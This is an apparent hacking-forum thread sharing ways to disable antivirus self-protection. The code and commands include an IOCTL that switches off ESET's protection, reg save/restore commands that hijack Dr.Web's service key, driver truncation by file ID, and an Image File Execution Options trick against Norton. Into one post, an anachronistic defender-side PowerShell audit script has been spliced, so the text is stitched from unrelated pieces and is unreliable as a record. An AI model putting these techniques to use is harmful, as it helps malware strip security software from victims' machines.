AV SP Discussion & Bypass

Forum for discussion about user-mode development.
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Wed Jun 26, 2013 2:05 am

Note about ESET SP bypassing, found it in the leaked super elite CrapBerp source pack :ugeek:
So, NOD allows opening its own processes with this access:
OpenProcess(PROCESS_DUP_HANDLE|PROCESS_QUERY_INFORMATION..)
After opening the process {ekrn.exe} they start enumerating its handles and duplicating them like here:
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS)
All duplicated handles are passed to NtDeviceIoControlFile with IOCTL 0x88770034:

Code:

UCHAR Buff[0x4] = {0x01, 0x00, 0x00, 0x00};
NtDeviceIoControlFile(hObject, NULL, NULL, NULL, &StatusBlock, 0x88770034, Buff, sizeof(Buff), Buff, sizeof(Buff));
Okay, in the case when the duplicated hObject == \Device\Eamon,
NtDeviceIoControlFile calls fastIoDispatch->FastIoDeviceControl of the eamon.sys driver.
Seems like IOCTL 0x88770034 just disables the AV SP.
Cause and effect

Alex
Posts: 268
Joined: Sun Mar 07, 2010 11:34 am

Re: AV SP Discussion & Bypass

Post by Alex » Wed Jun 26, 2013 4:23 pm

I was using the same method to exploit an old ESET vulnerability. So, ESET still doesn't protect access to its devices. I've never checked the functionality of the available IOCTLs, but this is not the first and not the last time such an easy scenario can be used to disarm AVs. Other AVs should also provide similar functionalities, especially if their GUIs are not protected... An old presentation (ESET once again): Disabling Antivirus program(s).
I am Jack's NULL pointer (actual e-mail contact.ntinternals_at_gmail.com)

AlephNull314
Posts: 1
Joined: Thu Oct 03, 2013 11:28 pm

Re: AV SP Discussion & Bypass

Post by AlephNull314 » Thu Oct 03, 2013 11:32 pm

Open source project, anti-AV compilation.
https://github.com/AlephNull314/AbsoluteZero

N3mes1s
Posts: 42
Joined: Wed Mar 09, 2011 5:17 pm

Re: AV SP Discussion & Bypass

Post by N3mes1s » Fri Oct 25, 2013 7:09 am

http://mallocat.com/another-journey-to- ... scalation/

Affected Avira Internet Security and AhnLab V3 Internet Security.

He used PoolBlade exploitation: http://mallocat.com/wp-content/uploads/ ... lBlade.pdf

0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Tue Feb 04, 2014 4:27 pm

I decided to make a video: "how I pwn KGBav with the new HIPS system" (DrWeb 9.0) with 100% stealth, without any popup windows, security alerts, etc.

What I have:
- full admin rights
- all work in user mode
- AV settings are paranoid

Video of this tragedy:
http://www.sendspace.com/file/8bukm5

P.S.
I recommend wiping this crap from your PC if you still believe in super elite AV protection.
p.ZZzz
SpiDie will never die :lol:
Cause and effect

KiFastCallEntry
Posts: 3
Joined: Wed Feb 26, 2014 2:04 pm

Re: AV SP Discussion & Bypass

Post by KiFastCallEntry » Wed Feb 26, 2014 2:10 pm

Nice work 0x16/7ton. Some lock tricks you discovered are not working anymore; I just get pissed off when I don't know how they protected from the tricks. Some AVs do not use any kind of FS filter driver, so I don't really get how they do it.

R00tKit
Posts: 129
Joined: Tue Nov 16, 2010 8:23 pm

Re: AV SP Discussion & Bypass

Post by R00tKit » Mon Mar 10, 2014 9:09 am

Hi

I found 2 (sharing one now) new vulnerabilities in Dr.Web Self Protection:

1) remove reg keys:

Code:

reg save HKLM\SYSTEM\CurrentControlSet\serviceMPTRAP  hive.hiv
reg restore HKLM\SYSTEM\CurrentControlSet\services\SpiderG3 hive.hiv
With this we can replace the fake key with the Dr.Web key, and Dr.Web will protect our service key :D
after replacing SpiderG3 with serviceMPTRAP :D
(attachment: reg.png)
Other AVs not tested (Kaspersky is safe :)


edit: solution

filter these (RegistryCallback):
Vista SP2+: RegNtPreRestoreKey, RegNtPreSaveKey, RegNtPreReplaceKey,
and use SSDT on Vista SP2-- (32bit)
@R00tkitSMM

R00tKit
Posts: 129
Joined: Tue Nov 16, 2010 8:23 pm

Re: AV SP Discussion & Bypass

Post by R00tKit » Mon Mar 10, 2014 3:32 pm

The second method is to get the file ID of the Dr.Web sys file in the drivers path and open the file by file ID with OPEN_EXISTING + TRUNCATE_EXISTING.
After this the sys file will be truncated; after reboot, no AV :D :mrgreen:

For Norton 2014 I also found this -> set Image File Execution Options for NIS.exe -> after reboot no AV :D :mrgreen:

So simple. Need a POC?
@R00tkitSMM
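A defender-side audit for the two registry-level vectors in the posts above, added here as an example; it is not part of R00tKit's post and not Dr.Web's or Norton's own code. It assumes an elevated PowerShell session, that the "Include command line in process creation events" audit policy is enabled (otherwise Security event 4688 carries no command line and the second check matches nothing), and an English-language event template for the "Process Command Line:" label; the pattern list and function names are my own.

```powershell
# Added example (not from this thread): audit the two registry vectors
# discussed above. Run from an elevated PowerShell session.

# 1) Image File Execution Options. A "Debugger" value under an image name
#    makes Windows start that debugger instead of the image, which is how an
#    IFEO entry for an AV executable keeps it from ever coming up. Legitimate
#    entries exist (e.g. a JIT debugger), so each hit is something to review.
$IfeoPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-IfeoDebuggerEntry {
    Get-ChildItem -Path $IfeoPath -ErrorAction SilentlyContinue | ForEach-Object {
        $debugger = (Get-ItemProperty -Path $_.PSPath -Name 'Debugger' -ErrorAction SilentlyContinue).Debugger
        if ($debugger) {
            [pscustomobject]@{
                Image    = $_.PSChildName   # executable name the entry applies to
                Debugger = $debugger        # what actually gets launched
                Key      = $_.Name
            }
        }
    }
}

# 2) reg.exe save/restore against service keys, the hive-swap trick above.
#    Security event 4688 ("A new process has been created") records the
#    command line only when the command-line audit policy is enabled.
#    Pattern is an assumption: plain reg.exe syntax, HKLM services subtree.
$SuspiciousRegPattern = '\breg(\.exe)?\s+(save|restore)\s+"?HKLM\\SYSTEM\\CurrentControlSet\\services'

function Get-ServiceKeyHiveOperation {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Security'
        Id        = 4688
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull the command line out of the rendered message; the label is the
        # English template text (assumption: adjust on localized systems).
        if ($_.Message -match 'Process Command Line:\s*(?<cmd>.+)') {
            $cmd = $Matches['cmd'].Trim()
            # -match is case-insensitive by default in PowerShell
            if ($cmd -match $SuspiciousRegPattern) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    CommandLine = $cmd
                }
            }
        }
    }
}

Get-IfeoDebuggerEntry            | Format-Table -AutoSize
Get-ServiceKeyHiveOperation -Hours 24 | Format-Table -AutoSize
```

The second check only sees what the Security log kept, so it is a retrospective audit, not the fix: the post's own "solution" edit names the real one, a registry callback that filters RegNtPreSaveKey, RegNtPreRestoreKey and RegNtPreReplaceKey for the protected keys, which is what closes the hive-swap path at the time it happens. The file-ID truncation method from the same post is not covered here.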

cuttingedge
Posts: 3
Joined: Mon Jul 02, 2012 5:17 am

Re: AV SP Discussion & Bypass

Post by cuttingedge » Tue Nov 03, 2015 12:59 am

Could someone make a mirror of all the dead sendspace.com links in this thread back from 2012? There were some great shares, but they did not upload them to kernelmode. Maybe someone has them archived?

Thank you!

EP_X0FF
Global Moderator
Posts: 4884
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Tue Nov 03, 2015 5:04 am

Most of these links were video files. Which one exactly do you want?
Ring0 - the source of inspiration
